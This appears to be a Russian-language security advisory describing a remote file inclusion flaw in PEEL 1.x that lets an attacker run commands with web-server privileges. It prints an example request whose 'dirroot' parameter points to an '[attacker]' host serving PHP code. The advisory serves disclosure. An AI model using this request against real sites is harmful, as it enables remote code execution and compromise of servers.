Выполнение произвольных команд в PEEL

Дата публикации:
04.01.2003
Всего просмотров:
627
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Peel 1.x
Описание: Уязвимость, обнаруженная в PEEL(http://www.mapetite-entreprise.com), позволяет удаленному атакующему включать произвольные файлы, расположенные на удаленном сервере. Если удаленный файл - PHP сценарий, то атакующий может выполнять произвольные команды с привилегиями Web сервера. Пример:
http://[target]/modeles/haut.php?dirroot=http://[attacker]&SESSION=.
with :
http://[attacker]/lang/lang.php
Уязвимость обнаружена в PEEL 0.1

Ссылки: PEEL (PHP)
или введите имя

CAPTCHA